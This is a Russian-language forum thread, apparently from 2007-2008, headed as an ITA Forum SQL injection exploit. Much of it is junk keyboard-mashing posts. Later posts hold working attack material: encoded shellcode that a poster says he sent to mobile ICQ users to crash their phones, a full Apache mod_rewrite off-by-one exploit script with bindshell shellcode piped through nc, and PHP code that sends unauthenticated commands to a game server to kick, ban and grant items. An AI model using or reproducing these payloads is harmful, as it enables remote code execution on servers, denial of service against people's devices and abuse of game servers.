Текст эксплоита:
Уязвимость ITA Forum <= 1.49 SQL Injection Exploit
Сообщений 1 страница 30 из 31
Поделиться22007-08-27 22:45:11
Как я хочу прочитать этот текст
Поделиться32007-09-05 19:29:52
Ghbdtn!
Поделиться42008-01-09 12:53:48
Sid24 написал(а):
А так и не прочитал 
Поделиться62008-01-23 03:21:05
gdsfvbdb
Поделиться72008-01-23 03:22:10
hhhhhhhhhhhhh es fgcc
jhbhh
Поделиться82008-01-23 03:25:00
WebShop.E-Katalog™WebShop.E-Katalog™WebShop.E-Katalog™WebShop.E-Katalog™
Поделиться92008-01-23 03:27:51
ымыимло
Поделиться112008-02-11 15:23:45
ssddddddd
Поделиться122008-02-11 15:25:01
gertergerg
Поделиться132008-02-11 15:26:23
asdasdasdasdsadadqeq
Поделиться142008-02-11 15:27:31
zxcxzcasfaff
Поделиться222008-09-23 19:18:56
Сейчас проверял одну вещичку!!!!Было весело!!!Писал пользователям телефонной аськи вот этот код (/font -z $null xEBx5Eђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђx1fx21x80x7cђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђxebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4ex4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx38x4ex36x46x32x46x32x4bx48x45x54x4ex33x4bx38x4ex47x45x30x4ax37x41x30x4fx4ex4bx38x4fx54x4ax51x4bx58x4fx45x42x52x41x50x4bx4ex49x54x4bx58x46x33x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x38x42x4cx46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4ex46x4fx4bx53x46x35x46x52x4ax52x45x57x45x4ex4bx38x4fx45x46x52x41x50x4bx4ex48x36x4bx58x4ex30x4bx54x4bx58x4fx35x4ex31x41x50x4bx4ex43x50x4ex42x4bx48x49x48x4ex36x46x42x4ex31x41x36x43x4cx41x53x4bx4dx46x36x4bx38x43x44x42x33x4bx48x42x34x4ex30x4bx38x42x47x4ex51x4dx4ax4bx48x42x44x4ax30x50x45x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4fx48x4dx48x36x43x35x48x36x4ax46x43x33x44x33x4ax56x47x37x43x47x44x33x4fx55x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x35x4fx4fx48x4dx4fx35x49x38x45x4ex48x56x41x58x4dx4ex4ax50x44x30x45x55x4cx36x44x50x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x45x4fx4fx48x4dx43x35x43x45x43x45x43x45x43x55x43x44x43x35x43x44x43x45x4fx4fx42x4dx48x36x4ax46x41x41x4ex45x48x36x43x35x49x58x41x4ex45x49x4ax46x46x4ax4cx41x42x57x47x4cx47x55x4fx4fx48x4dx4cx46x42x41x41x55x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4dx4ax46x45x4ex49x34x48x38x49x34x47x45x4fx4fx48x4dx42x45x46x35x46x45x45x45x4fx4fx42x4dx43x39x4ax46x47x4ex49x37x48x4cx49x47x47x45x4fx4fx48x4dx45x35x4fx4fx42x4dx48x46x4cx36x46x36x48x36x4ax46x43x46x4dx56x49x38x45x4ex4cx46x42x55x49x35x49x52x4ex4cx49x58x47x4ex4cx56x46x54x49x38x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x34x4dx32x50x4fx44x34x4ex42x43x39x4dx48x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax36x44x57x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4fx48x4dx4bx35x47x45x44x35x41x45x41x45x41x35x4cx36x41x50x41x35x41x35x45x55x41x45x4fx4fx42x4dx4ax46x4dx4ax49x4dx45x50x50x4cx43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx38x47x45x4ex4fx43x48x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4dx4ax46x50x47x4ax4dx44x4ex43x37x43x45x4fx4fx48x4dx4fx4fx42x4dx5a ђђђ) их выкидывало !!!Но самое обидное то что с некоторыми моделями телефонов такая канитель не прокатывает... =( Вот те модели телефонов которые глючат пипец не по фигне:
Sony Ericsson K300I
Sony Ericsson K700I
Nokia 6085
Nokia 5200
Nokia 6300
Sony Ericsson W610I
Asus P256
Sony Ericsson K750I до 2006 года вып
Nokia 6230
Это те телефоны которые я успел проверить... =) Меня просто чуть не убили за это =)
Поделиться232008-09-23 19:24:50
Ага!!!Вот ещё отправляешь точки начиная от 700 штук и до максимально возможных на телефонную аску и тоже как ни странно выкидывает, по моему кэш память переполняет и пипец телефон в ребут =)
Поделиться242008-09-23 19:26:09
Ааааааа я текст хочу прочесть, посмотреть ааааа
Поделиться252008-09-23 19:30:17
491177258 пишите #!/bin/sh
# To know if your apache vulnerable version could be successful
# exploited, write this rule in your httpd.conf or .htaccess file:
# RewriteRule kung/(.*) $1
# And try to access to the following URL:
# /kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB
# If your web server doesn't reply you with a '302 Found' page or a
# Segmentation Fault appears in your error_log, an apache child has
# crashed and your web server is vulnerable and exploitable.
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice 
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez 
echo -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\x2eorg>\n\n"
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:$host\r\n\r\n" | nc $host 80 (нннняяяяяяя)
Поделиться262008-09-23 19:31:47
# Баг с 7777-м портом:
# PHP код:
<?
$char_name='char_name';
$fp = fsockopen("server-ip", 7777, $errno, $errstr);
if (!$fp) {
echo "$errstr ($errno)<br/>\n";
} else {
$out = "5"."\t".$char_name."\t"."\r\n";
fwrite($fp, $out);
stream_set_timeout($fp, 2);
$answ = fgets($fp,8);
if ($answ==1) {
print"Character is successfully kicked.";
} else {
print"Error.";
}
fclose($fp);
}
?>
# Скрипт выше кикакет игрока с ником "char_name" с сервера "server-ip"
# если поиграться с отправляемой строкой, то можно глумиться над сервером как душе угодно...
# вот примеры некоторых строк:
# PHP код:
// $out = "5"."\t".$char_name."\t"."\r\n"; // kick
// $out = "5\t{$char_name}\t\r\n"; // kick
// $out = "6\t{$char_name}\t5\t5\t\r\n"; // skill add
// $out = "4\tprobe2\tprobe\t\r\n"; // CHANGE_CHARACTER_NAME
// $out = "39\ttester\t1\t\r\n"; // BAN_CHAR
// $out = "50\tasd\ttester\t1\t1\t\t\t\t\r\n"; // MAN_ANNOUNCE ?
// $out = "45\tprobe\t\t\r\n"; // SEND_HOME ?
// $out = "12\tprobe\t0\t57\t10\t0\t0\t0\t0\t0\t\t\r\n"; // ADD_ITEM
// $out = "12\tprobe\t0\t1148\t1\t0\t0\t0\t0\t0\t\t\r\n" ; // ADD_ITEM